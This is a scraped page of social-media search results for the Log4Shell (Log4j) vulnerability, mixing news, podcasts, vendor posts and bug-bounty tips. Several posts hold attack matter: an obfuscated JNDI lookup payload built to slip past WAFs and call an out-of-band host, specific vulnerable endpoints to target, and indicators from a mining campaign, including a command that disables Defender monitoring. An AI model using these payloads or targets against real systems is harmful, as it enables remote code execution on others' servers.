#log4shell search results
. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow
The #Log4Shell is "Not Dead" yet. It got 1st position in my methodology these days. Many organizations still uses vulnerable #Log4J in their apps. So don't let a single endpoint unchecked, scan everything. #BugBounty
Most orgs use #OpenSource without knowing what’s inside. When a zero-day vulnerability like #Log4Shell hits, that turns a bug into a crisis. 🎧 This #InfoQ #podcast unpacks the EU Cyber Resilience Act and its impact on open-source projects: bit.ly/48DNQqo #Security
In Dec 2021, the Log4Shell (CVE-2021-44228) vulnerability in Apache's Log4j shook the tech world, found by Alibaba Cloud's security team. Its ability to let attackers execute arbitrary code underscored the importance of up-to-date software. #Log4Shell
It's 2024, and a worrying trend is appearing on the Log4shell dashboard. In December, 25% of downloads of L4J were vulnerable to #log4shell - that number sits at 36% today and has been for a few weeks. We're going backwards.
UH OH SPICY GOT OFF HIS LAZY ASS AND FINALLY STARTED EDITING! Little sneak peek of the project I have going for YouTube, let me know what you think #infosec #cybersecurity #log4shell #Java #YouTube
⬇️ Ciberseguridad en entornos cloud ⬇️ - Gestión de logs. - Monitorización. - Atención a nuevas vulnerabilidades como #Log4Shell: ¡Parcheo! - Gestión de privilegios. 💡Descubre más en post del blog de @OVHcloud_ES: ovh.to/RLzqJFp #ciberseguridad #cloud #patrocinado
Watch this video with @TonyatESET and learn not just about the latest trends in #ransomware, but also about new statistics concerning #phishing and why the #Log4Shell vulnerability remains a problem. --------------- #WeLiveSecurity #ESET #WeekinSecurity
I used this docker image with Minecraft #Log4shell demonstration during my lectures about #cyberattacks at #gamefair2023 conference. Moreover, for victim machine, I used @ReactOS with #Java and #Minecraft server, it worked fine for proof of concept attack with calc execution.
Two years ago #Log4j (CVE-2021-44228) #vulnerability was present in many products, incl. #Minecraft. Recently, I prepared the #Docker image with vulnerable Minecraft server for demonstration of #Log4shell #exploit during my lectures malwarelab.eu/posts/log4shel… #Education #Java
An interesting (yet short) attack path that exploited #log4shell in @VMware #vRealize and harvested an #AWS Access Key to access an @elastic #logstash instance in AWS. This was buried among 1700 hosts, executed by NodeZero with no humans involved @Horizon3ai #Pentesting #infosec
Three years after #Log4Shell caused a significant security issue, we still struggle with insecure dependencies and injection problems, join @BrianVerm @vilojona @costlow @FrankDelporte for a lively #Java #OpenJDK and beyond discussion on Foojay! foojay.io/today/foojay-p…
I have a #Log4Shell payload on my GitHub Profile using a @ThinkstCanary Canary Token. Every once and a while I open my email and get a good chuckle 😂
#Log4Shell & #Spring4Shell proved that we need to keep our dependencies up-to-date From package managers to bots that can create changes on repositories, there are many tools. At #GOTOcph @MaritvanDijk77 will talk about keeping your dependencies in check gotocph.com/2023
Did you know Akamai denied over 2.5B #Log4j attack attempts in a single month? Akamai's @TonyLauro explains how #microsegmentation helped break the #Log4Shell kill chain. #SecureVibes #ZeroDay ow.ly/O2l450PHX7J
The persistent threat -- why major vulnerabilities like #Log4Shell and #Spring4Shell remain significant and super dangerous, by @brianverm @snyksec, #Java and beyond: foojay.io/today/the-pers… #foojaytip
Yesterday, when I applied my QR code magnets with the #EICAR #antivirus test string and the #Log4Shell PoC, the RVers holding a party across from me asked what the QR codes do. I said "they infect toll booth databases twenty years in the future."😈 I got a few laughs!
Currently infecting the I-80/90 toll road system with the #EICAR #antivirus test string and the #Log4Shell PoC string using my trusty QR code magnets! 😈
T-2 days until my summer RV journey begins with QR code magnets for the #EICAR #antivirus test string and the #Log4shell PoC! God help databases today & in the future as I go through weigh stations, toll booths, rest stops, truck stops, hi-tech traffic intersections… 😈
Yesterday, when I applied my QR code magnets with the #EICAR #antivirus test string and the #Log4Shell PoC, the RVers holding a party across from me asked what the QR codes do. I said "they infect toll booth databases twenty years in the future."😈 I got a few laughs!
Currently infecting the I-80/90 toll road system with the #EICAR #antivirus test string and the #Log4Shell PoC string using my trusty QR code magnets! 😈
Tomorrow we'll take Indiana's I-80/90 toll route toward Chicago, displaying both the #EICAR #antivirus test string and the #Log4Shell PoC QR code magnets on the vehicle. Watch out, future DFIR aficionados!
The idea of "all features in a single jar" ended up with "all CVEs in a single jar". So even if you use just StringUtils.containsIgnoreCase, you still get impacted by a CVE-2025-48924 in ClassUtils. That is exactly the pattern that caused #log4shell: JNDI was included by default
Most orgs use #OpenSource without knowing what’s inside. When a zero-day vulnerability like #Log4Shell hits, that turns a bug into a crisis. 🎧 This #InfoQ #podcast unpacks the EU Cyber Resilience Act and its impact on open-source projects: bit.ly/48DNQqo #Security
Did you know the Log4Shell vulnerability started with a dad trying to fix his son's Minecraft game? 😱 #Log4Shell #OpenSource github.blog/open-source/in…
Most orgs use #OpenSource without knowing what’s inside. When a zero-day vulnerability like #Log4Shell hits, that turns a bug into a crisis. 🎧 This #InfoQ #podcast unpacks the EU Cyber Resilience Act and its impact on open-source projects: bit.ly/48DNQqo #Security
#Log4j could have failed many times. But it survived. Not because of money, but because of people. An honest look behind the scenes — from the first line of code to the project’s greatest crisis. Read Christian Grobmeier’s new piece: javapro.io/2025/06/10/the… #Log4Shell @TheASF
Armis reveals 2025’s top supply chain threats: AI-driven slopsquatting attacks, security flaws in AI-generated code, and major software supply chain breaches reshape the global cybersecurity landscape. #Slopsquatting #Log4Shell #VibeCoding ift.tt/NevoE8t
Prevent The Next #Log4Shell-A Call To Action "Open Source Economy is a new nonprofit organization formed by maintainers of several critical Java libraries to build a safer, stronger #Java ecosystem" On IProgrammer➡️ cutt.ly/xrVlMgpp @OS_Economy #jvm #opensdk #oss
Log4Shell was supposed to be a turning point. But nearly 4 years later, funding dropped, gov’t focus shifted, & developers were pulled into AI. New blog: How AI & politics stalled open-source security → bit.ly/3V5oyK5 #CyberSecurity #OpenSource #Log4Shell
„Was, wenn wir im Urlaub gewesen wären?“ #Log4Shell traf 2021 Millionen Systeme – ein paar Freiwillige retteten das Netz. Christian Grobmeiers Rückblick auf 30 Jahre #Log4j zeigt, was #OpenSource leisten kann & dessen Grenzen, wenn Firmen nur konsumieren! javapro.io/de/die-lange-g…
Millions lost. Servers hijacked. All because of overlooked code patterns, you might still have today. @vilojona reveals the unseen traps. Are you truly protected against SQLi, #Log4Shell & deserialization hacks? Decode it here: javapro.io/2025/04/29/top… #DevSecOps #SQLInjection
. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow
¿Uff, se viene un nuevo #log4shell? Estar atentos a CVE-2022-42889 (CVSS 9.8) redpacketsecurity.com/apache-commons… juejin.cn/post/713027639… cve.report/CVE-2022-42889
"POST /xxxx/token.oauth2" in certain endpoints found to be vulnerable to #Log4Shell (CVE-2021-44228). Just replace the username with your payload. Check below 👇tweet to verify the vulnerability. #BugBounty
Another Tip: I found this VMWare vCenter #Log4Shell vulnerability in an endpoint using POST: /analytics/telemetry/ph/api/hyper/send?_c="${payload}". This RCE method actually of CVE-2021-22005, however this ep is vulnerable to Log4Shell as well. #BugBounty --> Bounty $2100.00.
I fell in love with #Log4Shell again; 4 P1s in a row. Its a simple recon and understanding where to spray the payload. This tweet is for you haters who made fun of my recent Log4Shell post. #BugBounty
Ox4Shell - Deobfuscate Log4Shell Payloads With Ease bit.ly/3cnwROs #Deobfuscation #Deobfuscator #Log4Shell #Ox4Shell #Oxeye
🔺 Explotación masiva de VMWare Horizon vía #Log4Shell (CVE-2021-44228) para instalación de Minero. IP atacante: 139.99.241.160 🇦🇺 LDAP: 135.125.146.221:1389 Minero: /150.129.234.203:82/add.bat "Set-MpPreference -DisableRealtimeMonitoring $true" IOCs: github.com/CronUp/Malware…
I found a multiple instances of #Tableau CSP in the endpoint "/vizql/csp-report/" are vulnerable to #Log4Shell ( CVE-2021-44228). The response may depend on the targets - so test yourself. Here is the POST request if anyone wants to test: pastebin.com/es3Aidfr #BugBounty
The #Log4Shell is "Not Dead" yet. It got 1st position in my methodology these days. Many organizations still uses vulnerable #Log4J in their apps. So don't let a single endpoint unchecked, scan everything. #BugBounty
Finally got my 5 months old #Log4Shell report triaged after a couple of "Need more infos" and "Not applicable", super excited🤪🤪😍😍. #BugBounty
NEW on #Log4Shell... Horde of miner bots and backdoors leveraged #Log4J to attack VMware Horizon servers 1/14
Today marks the 3-year anniversary of the #Log4Shell PoC going public 🧑🎄 I still remember going to sleep on the 9th with a PoC I couldn’t reproduce, only to wake up the next morning to all hell breaking loose and hundreds of RCEs everywhere. Would love to hear your stories! 💸
There have been over 840K attacks on companies globally, all exploiting the #Log4j (aka #Log4Shell) vulnerability. Learn more about this vulnerability: blck.by/34mUiTQ
We identified severe security issues within AWS #Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. bit.ly/3EqPbjd
⬇️ Ciberseguridad en entornos cloud ⬇️ - Gestión de logs. - Monitorización. - Atención a nuevas vulnerabilidades como #Log4Shell: ¡Parcheo! - Gestión de privilegios. 💡Descubre más en post del blog de @OVHcloud_ES: ovh.to/RLzqJFp #ciberseguridad #cloud #patrocinado
Something went wrong.
Something went wrong.
United States Trends
- 1. Dodgers 746K posts
- 2. World Series 395K posts
- 3. World Series 395K posts
- 4. Blue Jays 153K posts
- 5. Yamamoto 232K posts
- 6. Will Smith 52.5K posts
- 7. Miguel Rojas 45.3K posts
- 8. jungkook 326K posts
- 9. Yankees 16.3K posts
- 10. Kershaw 38.7K posts
- 11. Baseball 171K posts
- 12. Carlos Manzo 304K posts
- 13. Kendrick 18.6K posts
- 14. #Worlds2025 31.9K posts
- 15. Vladdy 23.1K posts
- 16. Dave Roberts 14.9K posts
- 17. Ohtani 92.2K posts
- 18. Mets 11.7K posts
- 19. Hoffman 12.8K posts
- 20. Cubs 7,790 posts